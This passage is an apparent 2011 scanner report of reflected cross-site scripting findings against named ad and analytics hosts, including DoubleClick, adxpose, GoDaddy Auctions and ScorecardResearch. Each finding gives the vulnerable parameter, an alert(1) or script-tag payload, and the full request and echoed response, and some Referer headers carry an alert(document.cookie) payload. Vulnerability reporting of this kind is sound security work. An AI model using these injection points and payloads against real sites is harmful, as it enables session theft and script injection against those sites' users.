jh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=162c53"-alert(1)-"9354907b3e&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

4.13. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ee8f"-alert(1)-"cfa1a2cd9c1 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw7ee8f"-alert(1)-"cfa1a2cd9c1&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:39:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7283

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
L2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw7ee8f"-alert(1)-"cfa1a2cd9c1&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallows
...[SNIP]...

4.14. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40f27"-alert(1)-"12d3ff8d5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l40f27"-alert(1)-"12d3ff8d5&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:38:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7275

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aeb/f/1c2/%2a/e%3B239614143%3B0-0%3B0%3B62445293%3B3454-728/90%3B41577488/41595275/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l40f27"-alert(1)-"12d3ff8d5&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0
...[SNIP]...

4.15. http://ads.adxpose.com/ads/ads.js [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload b617a<script>alert(1)</script>d0fbd595a25 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_321611b617a<script>alert(1)</script>d0fbd595a25 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=3737712935544550400?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0764E8067AD048B1710A67299AA363A4; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Set-Cookie: evlu=c6c75b6e-8553-43d3-8fc7-6ddce47cdd98; Domain=adxpose.com; Expires=Thu, 04-May-2079 17:03:21 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 13:49:13 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_321611b617a<script>alert(1)</script>d0fbd595a25".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_321611b617a<script>
...[SNIP]...

4.16. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0fc6"%3balert(1)//e92a6e136cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0fc6";alert(1)//e92a6e136cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b0fc6"%3balert(1)//e92a6e136cf=1 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 252812
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=sbhw2g45lra5ew55khjmd0n1; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=M1PWTDNAMWEB004&status=200 OK&querystring=b0fc6%22%3balert(1)%2f%2fe92a6e136cf=1&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 16 Apr 2011 13:57:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
<script type="text/javascript">
               function AddMembershipToCart()
               {
                   setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?b0fc6";alert(1)//e92a6e136cf=1");
                   if (document.getElementById("ctl00_cphMaster_tbBidAmount"))
                   { setCookie("IDPBid", document.getElementById("ctl00_cphMaster_tbBidAmount").value); }
                   else if (document.getElementBy
...[SNIP]...

4.17. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bcc8"><script>alert(1)</script>deeb52d7f31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7bcc8"><script>alert(1)</script>deeb52d7f31=1 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 253492
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=yafoqa55zfssbv55lwxafz55; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=M1PWTDNAMWEB004&status=200 OK&querystring=7bcc8%22%3e%3cscript%3ealert(1)%3c%2fscript%3edeeb52d7f31=1&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 16 Apr 2011 13:57:33 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
keyCode = event.keyCode ? event.keyCode : event.which ? event.which : event.charCode; if (keyCode == 13){ RecordClick(event, '22362', '');createFormAndSubmit('https://auctions.godaddy.com/trpHome.aspx?7bcc8"><script>alert(1)</script>deeb52d7f31=1');return false;}" />
...[SNIP]...

4.18. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload ae283<script>alert(1)</script>2c0f2ef6ff was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2ae283<script>alert(1)</script>2c0f2ef6ff&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:11 GMT
Date: Sat, 16 Apr 2011 13:51:11 GMT
Connection: close
Content-Length: 1252

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2ae283<script>alert(1)</script>2c0f2ef6ff", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.19. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload b5161<script>alert(1)</script>029ad526e2b was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c10=b5161<script>alert(1)</script>029ad526e2b&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:17 GMT
Date: Sat, 16 Apr 2011 13:51:17 GMT
Connection: close
Content-Length: 1253

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"b5161<script>alert(1)</script>029ad526e2b", c15:"", c16:"", r:""});

4.20. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 90e71<script>alert(1)</script>bdd122ed418 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15=90e71<script>alert(1)</script>bdd122ed418 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:15 GMT
Date: Sat, 16 Apr 2011 13:51:15 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"90e71<script>alert(1)</script>bdd122ed418", c16:"", r:""});

4.21. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 93f7e<script>alert(1)</script>4815f34f790 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=300569393f7e<script>alert(1)</script>4815f34f790&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:12 GMT
Date: Sat, 16 Apr 2011 13:51:12 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"300569393f7e<script>alert(1)</script>4815f34f790", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.22. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 28299<script>alert(1)</script>55b70b1e4ba was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=328299<script>alert(1)</script>55b70b1e4ba&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:12 GMT
Date: Sat, 16 Apr 2011 13:51:12 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"328299<script>alert(1)</script>55b70b1e4ba", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.23. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 908bc<script>alert(1)</script>b3a96683e20 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F908bc<script>alert(1)</script>b3a96683e20&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:13 GMT
Date: Sat, 16 Apr 2011 13:51:13 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
core;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/908bc<script>alert(1)</script>b3a96683e20", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.24. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied unmodified into the response, which is served as application/x-javascript, and lands inside the double-quoted string literal of the c5 property in the generated COMSCORE.beacon({...}) call. The payload 36087<script>alert(1)</script>c08dcabcf01 was submitted in the c5 parameter. This input was echoed without any encoding in the application's response.

This proof-of-concept attack demonstrates that the parameter reaches the script body without encoding. As with c4, the context is a JavaScript string literal rather than HTML text, so the <script> canary is inert and the effective injection is a double quote that closes the string followed by arbitrary JavaScript, executed in the origin of any page that includes beacon.js with attacker-influenced parameters.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=36087<script>alert(1)</script>c08dcabcf01&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:14 GMT
Date: Sat, 16 Apr 2011 13:51:14 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
r(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"36087<script>alert(1)</script>c08dcabcf01", c6:"", c10:"", c15:"", c16:"", r:""});



4.25. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

